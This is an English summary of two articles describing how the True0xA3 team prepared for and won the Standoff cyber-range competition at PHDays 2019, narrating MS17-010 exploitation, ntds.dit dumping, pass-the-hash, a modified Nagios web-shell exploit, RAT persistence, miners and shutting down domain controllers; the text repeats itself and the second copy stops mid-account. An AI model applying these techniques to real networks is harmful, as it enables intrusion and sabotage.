This is an English-language summary of two absolutely outstanding articles written by Vitaliy Malkin from «Informzashita» whose team, True0xA3, became the winners of the prestigious black hat competition The Standoff during Positive Hack Days 9 in May of 2019.
Vitaliy has published three detailed articles on Habr, two of which were dedicated to the description of the strategies that True0xA3 team used before and during the competition to secure this team the title of the winners. I felt that the only thing that those two articles were lacking was a summary in English so that a wider audience of readers could enjoy them. So, below is the summary of two articles by Vitaliy Malkin, together with images Vitaliy published to clarify his points. Vitaliy has OKed me doing the translation and publishing it.
Original article is here
The team consisted of 16 true-and-tried pentesters and 4 interns, armed with 6 servers and our own CUDA-station, plus the willingness to go the distance.
Active preparations started 8 days prior to the beginning of The Standoff. This was our 3rd attempt to win The Standoff, so some of us were experienced enough to know what needed to be done. From the start, we have discussed the following priorities for the team:
This is the weakness of all newbies on the Standoff: tasks are not being distributed effectively; several people are working on the same task; it is not clear which tasks have already been completed; results of a task are not forwarded to the proper members of the team, etc. The larger the team, the less effective is coordination among the team members. Most importantly, there has to be at least one person who understands the whole picture from the infrastructure standpoint, and who can put together multiple vulnerabilities into one focused attack vector.
This year we used collaboration platform Discord. It is similar to IRC-chat but with additional features like file uploads and voice calls. For each target in the Standoff map, we created a separate channel in which all the data would be gathered. This way a new team member assigned to a task could easily see every piece of info that has already been gathered for this task, the results of the deployments, etc. All info-channels had a limit of 1 message per minute to prevent flooding. Each object in the Standoff had its own dedicated chat space.
Each member of the team was given a clearly defined scope of work. To improve coordination, one person was assigned to make final decisions on all tasks. This prevented us from getting into long discussions and disagreements during the competition.
I believe the most important factor in the game turned out to be the ability to manage multiple projects and properly prioritize objectives. In the last year's game, we were able to take over an office and stay there simply because we used well-known vulnerabilities. This year we decided to make a list of such vulnerabilities ahead of time and organize our knowledge:
ms17-010; ms08-67; SMBCRY; LibSSH RCE; HP DATA Protectoer; HP iLo; ipmi; Cisco Smart Install; Java RMI; JDWP; JBOSS; drupalgeddon2; weblogic; heartbleed; shellshock; ibm websphere; iis-webdav; rservices; vnc; ftp-anon; NFS; smb-null; Tomcat
Then we created 2 services, checker and penetrator, which automated the testing for the vulnerabilities and the deployment of the publicly available exploits and metasploits. The services utilized results of nmap to expedite our work.
We did not have much experience with the analysis of vulnerabilities of Automated Process Control Systems (APCS). Approximately 8 days prior to the Standoff we started to dig into the topic. The situation with IoT and GSM was even worse. We never had experience with these systems outside of the prior Standoffs.
Therefore at the preparation stage, we selected 2 people to study Automated Process Control Systems (APCS) and 2 more to study GSM and IoT. The first team within a week created a list of typical approaches to pentesting of the SCADA systems and studied in details of videos of the previous year's infrastructure within the Standoff. They also downloaded approximately 200GB of various HMI, drivers, and other software related to the controllers. The IoT team prepared some hardware and read all available articles on GSM. We hoped it would be enough (spoiler alert: it was not!)
Since we had a pretty large team, we decided that we would need additional equipment. This is what we took with us:
Last year we understood the importance of the use of CUDA servers during hacking of a couple of handshakes. It is important to note that this year, as well as in previous years, all the red teamers were behind a NAT, so we could not use reverse-connects from DMZ. However, we assumed that all hosts other than Automated Process Control Systems (APCS) would have an internet connection. With this in mind, we decided to spin up 3 server-listeners available from the Internet. To make pivoting easier, we used our own OpenVPN server with client-to-client turned on. Unfortunately, automated creation of channels was not possible, therefore for 12 hours out of 28 one of the team members was devoted only to managing the channels.
Our previous experience with the Standoff already taught us that it was not enough to take over a sever. It was just as important to prevent other teams from gaining a foothold as well. Therefore we spent significant time on the RAT (Remote Administration Tool) with new signatures and scripts to harden Windows systems. We used a standard RAT but changed the obfuscation method slightly. The rules presented a bigger difficulty. Overall, we developed the following list of scripts:
For Linux systems, we developed a special init-script which closed all ports, moved SSH to a non-standard port, and created public keys for the team's access to SSH
On May 17th, 5 days prior to the Standoff, the organizers provided the briefing for the red teams. They provided a lot of info that affected our preparation. They published the map of the network, which allowed us to divide the network into zones and assign responsibilities for each zone to a team member. The most important info that the organizers provided was that APCS would be accessible only from one segment of the network, and that segment is not protected. Moreover, the disclosed that the highest points will be awarded for the APCS and for the secured offices. They also said that they would reward the ability of red teams to knock each other out of network.
We interpreted this to mean the following: «Whoever captures the bigbrogroup will likely win the game.» This is because our prior experience has taught us that no matter how the organizers penalize the loss of service, the blue teams will kill the vulnerable servers if they cannot patch them fast enough. This is because their respective companies are much more worried about publicity from a totally hacked system than about some lost points in a game. Our guess was correct, as we will soon see.
Therefore, we decided to divide the team into 4 parts:
I. Bigbrogroup. We decided to prioritize this task above all others, so we put our most experienced pentesters in that group. This mini-team was 5-people strong, and its main objective was to take over the domain and to prevent other teams from gaining access to the APCS.
II. Wireless networks. This team was responsible for watching Wifi, tracking new WAPs, capturing the handshakes and bruteforcing them. They were also responsible for GSP, but their main goal was to prevent other teams from taking over Wifi
III. Unprotected networks. This team spent the first 4 hours testing all unprotected networks and analyzing vulnerabilities. We understood that in the first 4 hours nothing of interest could happen in the protected segments, at least nothing that blue teams could not knock off, therefore we decided to spend those first few hours casing the unprotected networks, where things could be changed. And as it turned out, it was a good approach.
IV. Scanners group. The blue teams told us in advance that network topology will be constantly changing, so we devoted 2 people to scanning the network and detecting changes. Automation of this process turned out to be difficult since we had multiple networks with multiple settings. For example, in the first hour, our nmap worked in T3 mode, but by noon it barely worked in T1 mode.
Another important vector was the list of the software and technologies that the organizers provided during the briefing. We created a competency group for each of the technologies which could quickly assess the typical vulnerabilities. For some services, we found known vulnerabilities but we could not find any published exploits. This was, for example, a case with Redis Post-exploitation RCE. We were pretty sure that this vulnerability would be present in the Standoff infrastructure, therefore we decided to write our own 1-day exploit. Of course, we could not write the entire exploit, but overall we gathered 5 unpublished exploits which we were ready to deploy.
Unfortunately, we could not investigate all the technologies, but it turned out to be not that critical. Since we investigated the highest-priority ones, it turned out to be sufficient. We also prepared the list of controllers for APCS, which we also investigated in detail.
During the preparation phase, we gathered several tools for the surreptitious connection to the APCS network. For example, we prepared a cheap version of a Pineapple using a Raspberry. It would connect to the Ethernet of the production network and via GSM to the control service. We could then remote configure an Ethernet connection and then broadcast it via a built-in wifi module. Unfortunately, during the game the organizers made it clear that physical connection to the APCS would be prohibited, therefore we ended up not being able to use the module.
We found quite a bit of info about the work of the bank, offshore accounts, and the antifraud. However, we also found out that the bank did not have that much money in it, so we decided not to spend time preparing for that object, and just play it by ear during the game.
In summary, we did quite a bit of work during the preparation phase. I would like to note that, besides the obvious benefit to being the winners of the Standoff competition, we reaped less noticeable but no less important benefits, such as
Looking back, I am realizing that our victory in the Standoff was probably secured long before the game began, during the preparation stage. Now, what actually took place during the Standoff will be described in Part II of this series
The original article is here
From Vitaliy Malkin, the head of the red team of InformZachita company and the captain of the True0xA3 team. True0xA3 won one of the most prestigious white hat competitions in Russia — the Standoff at PHDays 2019.
9:45 MSK
The day started by receiving the results of the MassScan. We started by listing out all the hosts with 445 ports opened, and exactly at 10 am we deployed the checker for the metasploit MS17-010. According to our plan, our main objective was to capture the domain controller of the domain bigbrogroup, therefore 2 people from our team were devoted just to that. Below you will see the initial assignments for each group.
As you can see, we attempted to penetrate every office in the game, and the fact that we had 20 people was making a big difference.
10:15
One of the team members from Team1 finds a host in the domain bigbrogroup.phd which is vulnerable to MS17-010. We deployed the exploit in a great hurry. A couple of year ago we had the situation where we were able to get the meterpreter (phishing attack carrying the remote execution code) shell to an important target but were kicked out of it in 10 seconds. This year we were more prepared. We take over the host, close the SMB port and change the RDP to port 50002. We are paying great attention to the process of persistence on the domain, therefore we create a few local admin accounts and deploy our own Remote Administration Tools (RAT). Only after that we moved on to the next task
10:25
We continue to go through the results of the info we gathered from the host. Besides the access to the internal network and the connection to the domain controller we also find the token of the domain admin. Before we get too excited about it, we check whether the token is still valid. And then we rejoice. First domain has fallen. Total time spent is 27 min 52 seconds
Half an hour from the start time we visit the player portal to understand the rules of turning in flags and receiving points. We see the standard list: the domain admin logins, local admins, exchange admins, and a few other admins. From the domain, we download ntds.dit while at the same time getting our CUDA-station ready. Then we discover reversible encryption is this in the domain, so now we can get all the passwords we need. To understand which passwords we need, we form a team of 2 people who start to analyze the structure of the AD and its groups. 5 minutes later they turn in the results. We turn in our flags and wait. It was about time to get our First Blood, at least to boost the team's morale if nothing else. But nothing. It took us an hour of trying to understand that the checker works like this:
Finally, we figure out the right format and around 11 am we get our First Blood. Whew!
11:15
Team 1 is being split into two subteams. Subteam 1 continues to fortify the domain: they get krbtgt, harden baseline, change passwords to the directory services. The Standoff organizers told us during the briefing that the first ones on the domain get to play as they want. So we change the admin passwords so that even if someone comes in and manages to kick us out, they won’t be able to get the logins to turn in their flags for points.
Team 2 continues to investigate the domain structure and finds another flag. On the desktop of the CFO, they find a financial report. Unfortunately, it is zipped and password protected. So, we turn on the CUDA station. We turn the zip into a hash and send it to hashcat.
Team 2 continues to find interesting services with RCE (remote code execution) and starts to look into them. One of them is a monitoring service for the domain cf-media built on the base of Nagios. Another one is the schedule manager for a shipping company built around some strange technology that we have never seen before. There are also a few interesting services such as DOC-to-DPF converters.
The second subteam of Team 1 by that time has already started to work on the bank and found an interesting database in MongoDB, which contains, among many other things, the name of our team and other teams, and their balances. We change our team's balance to 50 million and move on.
14:00
Luck has left us. First of all, the two services for which we had RCE in the protected segments became unavailable. The blue team simply turned them off. Of course, we complain to the organizers about rule violations, but with no effect. In the Standoff there are no business processes to protect! Second of all, we cannot find a list of clients. We are suspecting that it is hidden somewhere in the depths of 1C, but we have no databases, no configuration files. Dead end.
We are trying to set up the VPN channel between our remote servers and the Automated Process Control Systems (APCS). For some strange reason, we do it not on the domain controller of bigbrogroup, and the connection between the interfaces break. Now the domain controller is not accessible. The part of the team responsible for the access to the domain nearly suffers a heart attack. The tension between the team members grows, the fingerpointing begins.
Then we realize that the domain controller is accessible, but the VPN connection is unstable. We carefully backtrack in our steps, via RDP we turn off the VPN, and voila, the domain controller is accessible again. The team collectively exhales. In the end, we set up the VPN from another server. The domain controller is being babied and pampered. All competing teams still have 0 points, and this is reassuring.
16:50
The organizers finally publish a miner. Using psexec we set it up on all the endpoints that we control. This brings in a little bit of steady income flow.
Team 2 is still working on the Nagios vulnerability. They have the version with the vulnerability
<=5.5.6 CVE-2018-15710 CVE-2018-15708. A public exploit is available, but it needs a Reverse-connect to download the web-shell. Since we are behind the NAT, we have to rewrite the exploit and break it into two parts. The first part forces Nagios to connect to our remote server via the Internet, and the second part, located on the server itself, gives Nagios the web-shell. This gives us access via proxy to the cf-media domain. But the connection is unstable and difficult to use, so we decide to sell the exploit for the BugBounty bucks, while at the same time trying to elevate our access to root.
18:07
Here come the promised «surprises» from the organizers. They announce that BigBroGroup just purchased CF-media. We are not terribly surprised. During our investigation of the bigbrogroup domain, we noticed the trust relationships between bigbrogroup and cf-media domains.
At the time when the takeover of the CF-media was announced, we still did not have a connection to their network. But after the announcement, the access appeared. This saved us from spinning our wheels trying to pivot from Nagios. The credentials from Bigbrogroup work on cf-media domain, but the users do not have privileges. No easily exploitable vulnerabilities are found yet, but we are pretty optimistic that something will turn up.
18:30
Suddenly we are kicked off from the bigbrogroup domain. By whom? How? It looks like team TSARKA is the culprit! They are changing the admin password, but we have 4 other admin accounts in the reserves. We change the domain admin password again, reset all passwords. But minutes later we are kicked out again! At that exact time, we find a vector to the cf-media domain. On one of their servers, the username and password match the ones we previously found on the bigbrogroup domain. Oh, password reuse! What would we do without you? Now we just need a hash. We use hashkiller and get password P@ssw0rd. Moving on.
19:00
The struggle for control over the bidbrogroup is becoming a serious problem. TSARKA has changed the password to krbtgt twice, we lose all the admin accounts… what's next? Dead end?
19:30
We finally get the domain admin privileges on cf-media and start to turn in our flags. Despite the fact that this is supposed to be a secured domain, we see reversible encryption. So, now we have the logins and passwords, and we proceed through the same steps as with the bigbrogroup. We create additional admins, strengthen our foothold, harden the baseline, change passwords, create a VPN connection. We find a second financial report, also as a protected zip. We check with the team responsible for the first report. They have managed to brute it, but the organizers won't accept it. Turns out, it needed to be turned in as a protected 7zip! So, we did not even have to brute it! 3 hours of work for nothing.
We turn in both reports as protected 7zip files. Our total balance so far is 1 million points, and TSARKA has 125,000, and they are starting to turn in their flags from the bigbrogroup domain. We realize we have to stop them from turning in their flags, but how?
19:30
We find a solution! We still have the credentials of the local admins. We log in, take over the ticket, and simply turn off the domain controller. The controller is powering off. We close all server ports except for RDP and change passwords of all our local admins. Now we are in our little space and they are in theirs. If only the VPN connection would stay stable! The team collectively exhales.
In the meantime, we set up miners on all endpoints in cf-media domain. TSARKA is ahead of us in the overall volume, but we are not far behind, and we have more horsepower.
Here you can see the changes we made in the team during the night.
Some of the team members have to leave for the night. By midnight we are down to 9 people. Productivity falls to near zero. Every hour we get up to splash our faces with water and to go outside to get some air, just to shake off the sleepiness.
Now, at last, we are getting to the Automated Process Control Systems (APCS)
02.00
The last few hours have been very discouraging. We have found several vectors, but they are already closed. We cannot tell whether they were closed to start with or whether TSARKA has already been here. Slowly studying the APCS, we and find a vulnerable NetBus controller. We use a metasploit module that we do not entirely understand how it works. Suddenly, the lights in the city go off. Organizers announce that they will count this in if we can turn the light back on. At that moment, our VPN goes down. The server managing the VPN was taken over by TSARKA! It looks like we were discussing the APCS too loudly and they managed to take over.
03.30
Even the most dedicated of us are starting to nod off. Only 7 are still working. Suddenly, without any explanation, the VPN is back on. We quickly repeat the trick with the city lights, and we see our balance going up by 200,000 points!!!
One part of the team is still looking for additional vectors, while another is working on the APCS. There we find two additional vulnerabilities. One of them we are able to exploit. But the outcome of the exploit could be a rewrite of the firmware of the microcontroller. We discuss this with the organizers and decide that we will wait for the rest of our team to rejoin us in the morning and then decide collectively what to do.
05:30
Our VPN works about 10 minutes every hour, and then it disconnects again. Within that time, we try to work. But the productivity is near zero. Eventually, we decide to take one hour each to nap. Spoiler alert — bad idea!
5 people are still working on the APCS.
In the morning we suddenly realize that we are ahead of other teams by almost 1 million points. TSARKA was able to turn in two flags from APCS, plus a several flags from the telecom provider and the bigbrogroup. Also, they have miners working, and they must have some crypto that they have not turned in yet. We estimated that they had a minimum of 200-300 thousand more points in crypto. This is unnerving. We have a feeling that they might have a few more flags that they are strategically holding back until the final hours. But our team is coming back online. The morning sound check on the main arena is a little annoying but does chases the sleep away.
We are still working on trying to break into the APCS, but the hope is dimming. The difference in the points between the first and the second team and the rest of the teams is gigantic. We are worrying that the organizers might decide to throw in a few more «surprises» to shake things up.
After having a joined press-conference with TSARKA on the main arena we decide to change our strategy from «get more flags» to «prevent TSARKA from turning in more flags.»
On one of our servers, we fire up Cain&Abel and redirect all traffic to our server. We find some VPNs from Kazakhstan and kill them. Then we decide to kill all traffic everywhere, so we create a local firewall on the VPN channel to drop all traffic within the APCS network. This is how you protect an APCS! The organizers are now complaining that they lost connection to the APCS. We open access for their IP addresses (this is NOT how you protect the APCS).
12:47
We were right to worry about the organizers trying to shake things up. Out of nowhere, there is a data dump containing 4 logins for each domain. We mobilize the entire team.
Objectives:
Team 1: immediately take over all protected segments.
Team 2: use Outlook Web Access to change all passwords to the logins.
Some blue teams, sensing a lot of activity, simply turn off the VPN. Others are more tricksy and change the system language to Chinese. Technically, the service is still up! But of course, in practice, it is not usable (organizers, pay attention!). Via VPN we are able to connect to 3 of the networks. In one of them, we only last 1 minute before being kicked out.
12:52
We locate a behealthy server with the MS17-010 vulnerability (supposedly a protected segment?). We exploit it quickly, encountering no resistance. We obtain the hash of the domain admin and via Pth we access the domain controller. And guess what do we find there? Reversible encryption!
Whoever was protecting that segment has not done their homework. We collect all the flags, except for the part related to 1C. There is a good chance we could get it if we spent another 30-40 minutes there, but we decide to simply turn off the behealthy domain controller. Who needs competition?
13:20
We turn in our flags. We now have 2,900,000 points, plus a few outstanding bug bounties. TSARKA has a little over 1 million. They turn in their cryptocurrency and get another 200,000. We are now pretty sure they won’t be able to catch up, it would be almost impossible.
13:55
People are coming up and congratulating us. We are still worried about some surprise from the organizers, but it looks like we are really being announced as the winners!
This is the chronicle of the 28 hours of True0xA3. Of course, I left out a lot. For example, the press conferences on the arena, the torture that were the Wifi and the GSM, the interaction with the reporters… but I hope I captured the most interesting moments.
This was one of the most elevating experience for our team, and I hope that I was able to give you at least a little bit of a sense of what the atmosphere of the Standoff feels like, and to entice you to try to participate, too!
Next, I will publish the last part of this series, where I will analyze our mistakes and the ways to remediate them in the future. Because learning on someone else's mistakes is the best type of learning, right?
Vitaliy has published three detailed articles on Habr, two of which were dedicated to the description of the strategies that True0xA3 team used before and during the competition to secure this team the title of the winners. I felt that the only thing that those two articles were lacking was a summary in English so that a wider audience of readers could enjoy them. So, below is the summary of two articles by Vitaliy Malkin, together with images Vitaliy published to clarify his points. Vitaliy has OKed me doing the translation and publishing it.
PART I. Getting ready for the battle
Original article is here
I. Initial objectives
The team consisted of 16 true-and-tried pentesters and 4 interns, armed with 6 servers and our own CUDA-station, plus the willingness to go the distance.
Active preparations started 8 days prior to the beginning of The Standoff. This was our 3rd attempt to win The Standoff, so some of us were experienced enough to know what needed to be done. From the start, we have discussed the following priorities for the team:
- Smooth coordination among team members
- Collection of low hanging fruits
- Exploit of non-typical for us vulnerabilities such as Automated Process Control Systems (APCS), Distributed Control Systems (DCS), IoT, GSM
- Getting our own infrastructure and equipment set up ahead of time
- Developing some strategy for persistence and hardening
Coordination:
This is the weakness of all newbies on the Standoff: tasks are not being distributed effectively; several people are working on the same task; it is not clear which tasks have already been completed; results of a task are not forwarded to the proper members of the team, etc. The larger the team, the less effective is coordination among the team members. Most importantly, there has to be at least one person who understands the whole picture from the infrastructure standpoint, and who can put together multiple vulnerabilities into one focused attack vector.
This year we used collaboration platform Discord. It is similar to IRC-chat but with additional features like file uploads and voice calls. For each target in the Standoff map, we created a separate channel in which all the data would be gathered. This way a new team member assigned to a task could easily see every piece of info that has already been gathered for this task, the results of the deployments, etc. All info-channels had a limit of 1 message per minute to prevent flooding. Each object in the Standoff had its own dedicated chat space.
Each member of the team was given a clearly defined scope of work. To improve coordination, one person was assigned to make final decisions on all tasks. This prevented us from getting into long discussions and disagreements during the competition.
Collecting low-hanging fruits
I believe the most important factor in the game turned out to be the ability to manage multiple projects and properly prioritize objectives. In the last year's game, we were able to take over an office and stay there simply because we used well-known vulnerabilities. This year we decided to make a list of such vulnerabilities ahead of time and organize our knowledge:
ms17-010; ms08-67; SMBCRY; LibSSH RCE; HP DATA Protectoer; HP iLo; ipmi; Cisco Smart Install; Java RMI; JDWP; JBOSS; drupalgeddon2; weblogic; heartbleed; shellshock; ibm websphere; iis-webdav; rservices; vnc; ftp-anon; NFS; smb-null; Tomcat
Then we created 2 services, checker and penetrator, which automated the testing for the vulnerabilities and the deployment of the publicly available exploits and metasploits. The services utilized results of nmap to expedite our work.
Exploit of non-typical for us vulnerabilities
We did not have much experience with the analysis of vulnerabilities of Automated Process Control Systems (APCS). Approximately 8 days prior to the Standoff we started to dig into the topic. The situation with IoT and GSM was even worse. We never had experience with these systems outside of the prior Standoffs.
Therefore at the preparation stage, we selected 2 people to study Automated Process Control Systems (APCS) and 2 more to study GSM and IoT. The first team within a week created a list of typical approaches to pentesting of the SCADA systems and studied in details of videos of the previous year's infrastructure within the Standoff. They also downloaded approximately 200GB of various HMI, drivers, and other software related to the controllers. The IoT team prepared some hardware and read all available articles on GSM. We hoped it would be enough (spoiler alert: it was not!)
Getting our own infrastructure and equipment set up
Since we had a pretty large team, we decided that we would need additional equipment. This is what we took with us:
- CUDA-server
- Backup laptop
- WiFi router
- Switch
- Variety of network cables
- WiFi Alfa
- Rubber duckies
Last year we understood the importance of the use of CUDA servers during hacking of a couple of handshakes. It is important to note that this year, as well as in previous years, all the red teamers were behind a NAT, so we could not use reverse-connects from DMZ. However, we assumed that all hosts other than Automated Process Control Systems (APCS) would have an internet connection. With this in mind, we decided to spin up 3 server-listeners available from the Internet. To make pivoting easier, we used our own OpenVPN server with client-to-client turned on. Unfortunately, automated creation of channels was not possible, therefore for 12 hours out of 28 one of the team members was devoted only to managing the channels.
Developing some strategy for persistence and hardening
Our previous experience with the Standoff already taught us that it was not enough to take over a sever. It was just as important to prevent other teams from gaining a foothold as well. Therefore we spent significant time on the RAT (Remote Administration Tool) with new signatures and scripts to harden Windows systems. We used a standard RAT but changed the obfuscation method slightly. The rules presented a bigger difficulty. Overall, we developed the following list of scripts:
- Closing the SMB (server message block) and RPC (remote procedure call) ports
- Moving RDP (remote desktop protocol) to non-standard ports
- Turning off reversible encryption, guest accounts, and other typical issues of the security baseline
For Linux systems, we developed a special init-script which closed all ports, moved SSH to a non-standard port, and created public keys for the team's access to SSH
II. Briefing
On May 17th, 5 days prior to the Standoff, the organizers provided the briefing for the red teams. They provided a lot of info that affected our preparation. They published the map of the network, which allowed us to divide the network into zones and assign responsibilities for each zone to a team member. The most important info that the organizers provided was that APCS would be accessible only from one segment of the network, and that segment is not protected. Moreover, the disclosed that the highest points will be awarded for the APCS and for the secured offices. They also said that they would reward the ability of red teams to knock each other out of network.
We interpreted this to mean the following: «Whoever captures the bigbrogroup will likely win the game.» This is because our prior experience has taught us that no matter how the organizers penalize the loss of service, the blue teams will kill the vulnerable servers if they cannot patch them fast enough. This is because their respective companies are much more worried about publicity from a totally hacked system than about some lost points in a game. Our guess was correct, as we will soon see.
Therefore, we decided to divide the team into 4 parts:
I. Bigbrogroup. We decided to prioritize this task above all others, so we put our most experienced pentesters in that group. This mini-team was 5-people strong, and its main objective was to take over the domain and to prevent other teams from gaining access to the APCS.
II. Wireless networks. This team was responsible for watching Wifi, tracking new WAPs, capturing the handshakes and bruteforcing them. They were also responsible for GSP, but their main goal was to prevent other teams from taking over Wifi
III. Unprotected networks. This team spent the first 4 hours testing all unprotected networks and analyzing vulnerabilities. We understood that in the first 4 hours nothing of interest could happen in the protected segments, at least nothing that blue teams could not knock off, therefore we decided to spend those first few hours casing the unprotected networks, where things could be changed. And as it turned out, it was a good approach.
IV. Scanners group. The blue teams told us in advance that network topology will be constantly changing, so we devoted 2 people to scanning the network and detecting changes. Automation of this process turned out to be difficult since we had multiple networks with multiple settings. For example, in the first hour, our nmap worked in T3 mode, but by noon it barely worked in T1 mode.
Another important vector was the list of the software and technologies that the organizers provided during the briefing. We created a competency group for each of the technologies which could quickly assess the typical vulnerabilities. For some services, we found known vulnerabilities but we could not find any published exploits. This was, for example, a case with Redis Post-exploitation RCE. We were pretty sure that this vulnerability would be present in the Standoff infrastructure, therefore we decided to write our own 1-day exploit. Of course, we could not write the entire exploit, but overall we gathered 5 unpublished exploits which we were ready to deploy.
Unfortunately, we could not investigate all the technologies, but it turned out to be not that critical. Since we investigated the highest-priority ones, it turned out to be sufficient. We also prepared the list of controllers for APCS, which we also investigated in detail.
During the preparation phase, we gathered several tools for the surreptitious connection to the APCS network. For example, we prepared a cheap version of a Pineapple using a Raspberry. It would connect to the Ethernet of the production network and via GSM to the control service. We could then remote configure an Ethernet connection and then broadcast it via a built-in wifi module. Unfortunately, during the game the organizers made it clear that physical connection to the APCS would be prohibited, therefore we ended up not being able to use the module.
We found quite a bit of info about the work of the bank, offshore accounts, and the antifraud. However, we also found out that the bank did not have that much money in it, so we decided not to spend time preparing for that object, and just play it by ear during the game.
In summary, we did quite a bit of work during the preparation phase. I would like to note that, besides the obvious benefit to being the winners of the Standoff competition, we reaped less noticeable but no less important benefits, such as
- We took a break from the day-to-day minutiae of work and tried something that we have long hoped to do
- This was our first experience where the entire pentesting team was working on a single task, so the team building effect was very noticeable
- A lot of the information we gathered during the preparation for the game we can use for our real-life pentesting projects, we have increased our level of competency and created new, ready-to-use tools
Looking back, I am realizing that our victory in the Standoff was probably secured long before the game began, during the preparation stage. Now, what actually took place during the Standoff will be described in Part II of this series
Part II. Winning the Standoff. Sharing the lifehacks
The original article is here
From Vitaliy Malkin, the head of the red team of InformZachita company and the captain of the True0xA3 team. True0xA3 won one of the most prestigious white hat competitions in Russia — the Standoff at PHDays 2019.
Day One
9:45 MSK
The day started by receiving the results of the MassScan. We started by listing out all the hosts with 445 ports opened, and exactly at 10 am we deployed the checker for the metasploit MS17-010. According to our plan, our main objective was to capture the domain controller of the domain bigbrogroup, therefore 2 people from our team were devoted just to that. Below you will see the initial assignments for each group.
As you can see, we attempted to penetrate every office in the game, and the fact that we had 20 people was making a big difference.
10:15
One of the team members from Team1 finds a host in the domain bigbrogroup.phd which is vulnerable to MS17-010. We deployed the exploit in a great hurry. A couple of year ago we had the situation where we were able to get the meterpreter (phishing attack carrying the remote execution code) shell to an important target but were kicked out of it in 10 seconds. This year we were more prepared. We take over the host, close the SMB port and change the RDP to port 50002. We are paying great attention to the process of persistence on the domain, therefore we create a few local admin accounts and deploy our own Remote Administration Tools (RAT). Only after that we moved on to the next task
10:25
We continue to go through the results of the info we gathered from the host. Besides the access to the internal network and the connection to the domain controller we also find the token of the domain admin. Before we get too excited about it, we check whether the token is still valid. And then we rejoice. First domain has fallen. Total time spent is 27 min 52 seconds
Half an hour from the start time we visit the player portal to understand the rules of turning in flags and receiving points. We see the standard list: the domain admin logins, local admins, exchange admins, and a few other admins. From the domain, we download ntds.dit while at the same time getting our CUDA-station ready. Then we discover reversible encryption is this in the domain, so now we can get all the passwords we need. To understand which passwords we need, we form a team of 2 people who start to analyze the structure of the AD and its groups. 5 minutes later they turn in the results. We turn in our flags and wait. It was about time to get our First Blood, at least to boost the team's morale if nothing else. But nothing. It took us an hour of trying to understand that the checker works like this:
- It is automated
- It has a very inflexible format
- If you turn your flags to the check and did not receive a response in a few seconds, then your format does not match the checker's format
Finally, we figure out the right format and around 11 am we get our First Blood. Whew!
11:15
Team 1 is being split into two subteams. Subteam 1 continues to fortify the domain: they get krbtgt, harden baseline, change passwords to the directory services. The Standoff organizers told us during the briefing that the first ones on the domain get to play as they want. So we change the admin passwords so that even if someone comes in and manages to kick us out, they won’t be able to get the logins to turn in their flags for points.
Team 2 continues to investigate the domain structure and finds another flag. On the desktop of the CFO, they find a financial report. Unfortunately, it is zipped and password protected. So, we turn on the CUDA station. We turn the zip into a hash and send it to hashcat.
Team 2 continues to find interesting services with RCE (remote code execution) and starts to look into them. One of them is a monitoring service for the domain cf-media built on the base of Nagios. Another one is the schedule manager for a shipping company built around some strange technology that we have never seen before. There are also a few interesting services such as DOC-to-DPF converters.
The second subteam of Team 1 by that time has already started to work on the bank and found an interesting database in MongoDB, which contains, among many other things, the name of our team and other teams, and their balances. We change our team's balance to 50 million and move on.
14:00
Luck has left us. First of all, the two services for which we had RCE in the protected segments became unavailable. The blue team simply turned them off. Of course, we complain to the organizers about rule violations, but with no effect. In the Standoff there are no business processes to protect! Second of all, we cannot find a list of clients. We are suspecting that it is hidden somewhere in the depths of 1C, but we have no databases, no configuration files. Dead end.
We are trying to set up the VPN channel between our remote servers and the Automated Process Control Systems (APCS). For some strange reason, we do it not on the domain controller of bigbrogroup, and the connection between the interfaces break. Now the domain controller is not accessible. The part of the team responsible for the access to the domain nearly suffers a heart attack. The tension between the team members grows, the fingerpointing begins.
Then we realize that the domain controller is accessible, but the VPN connection is unstable. We carefully backtrack in our steps, via RDP we turn off the VPN, and voila, the domain controller is accessible again. The team collectively exhales. In the end, we set up the VPN from another server. The domain controller is being babied and pampered. All competing teams still have 0 points, and this is reassuring.
16:50
The organizers finally publish a miner. Using psexec we set it up on all the endpoints that we control. This brings in a little bit of steady income flow.
Team 2 is still working on the Nagios vulnerability. They have the version with the vulnerability
<=5.5.6 CVE-2018-15710 CVE-2018-15708. A public exploit is available, but it needs a Reverse-connect to download the web-shell. Since we are behind the NAT, we have to rewrite the exploit and break it into two parts. The first part forces Nagios to connect to our remote server via the Internet, and the second part, located on the server itself, gives Nagios the web-shell. This gives us access via proxy to the cf-media domain. But the connection is unstable and difficult to use, so we decide to sell the exploit for the BugBounty bucks, while at the same time trying to elevate our access to root.
18:07
Here come the promised «surprises» from the organizers. They announce that BigBroGroup just purchased CF-media. We are not terribly surprised. During our investigation of the bigbrogroup domain, we noticed the trust relationships between bigbrogroup and cf-media domains.
At the time when the takeover of the CF-media was announced, we still did not have a connection to their network. But after the announcement, the access appeared. This saved us from spinning our wheels trying to pivot from Nagios. The credentials from Bigbrogroup work on cf-media domain, but the users do not have privileges. No easily exploitable vulnerabilities are found yet, but we are pretty optimistic that something will turn up.
18:30
Suddenly we are kicked off from the bigbrogroup domain. By whom? How? It looks like team TSARKA is the culprit! They are changing the admin password, but we have 4 other admin accounts in the reserves. We change the domain admin password again, reset all passwords. But minutes later we are kicked out again! At that exact time, we find a vector to the cf-media domain. On one of their servers, the username and password match the ones we previously found on the bigbrogroup domain. Oh, password reuse! What would we do without you? Now we just need a hash. We use hashkiller and get password P@ssw0rd. Moving on.
19:00
The struggle for control over the bidbrogroup is becoming a serious problem. TSARKA has changed the password to krbtgt twice, we lose all the admin accounts… what's next? Dead end?
19:30
We finally get the domain admin privileges on cf-media and start to turn in our flags. Despite the fact that this is supposed to be a secured domain, we see reversible encryption. So, now we have the logins and passwords, and we proceed through the same steps as with the bigbrogroup. We create additional admins, strengthen our foothold, harden the baseline, change passwords, create a VPN connection. We find a second financial report, also as a protected zip. We check with the team responsible for the first report. They have managed to brute it, but the organizers won't accept it. Turns out, it needed to be turned in as a protected 7zip! So, we did not even have to brute it! 3 hours of work for nothing.
We turn in both reports as protected 7zip files. Our total balance so far is 1 million points, and TSARKA has 125,000, and they are starting to turn in their flags from the bigbrogroup domain. We realize we have to stop them from turning in their flags, but how?
19:30
We find a solution! We still have the credentials of the local admins. We log in, take over the ticket, and simply turn off the domain controller. The controller is powering off. We close all server ports except for RDP and change passwords of all our local admins. Now we are in our little space and they are in theirs. If only the VPN connection would stay stable! The team collectively exhales.
In the meantime, we set up miners on all endpoints in cf-media domain. TSARKA is ahead of us in the overall volume, but we are not far behind, and we have more horsepower.
NIGHT
Here you can see the changes we made in the team during the night.
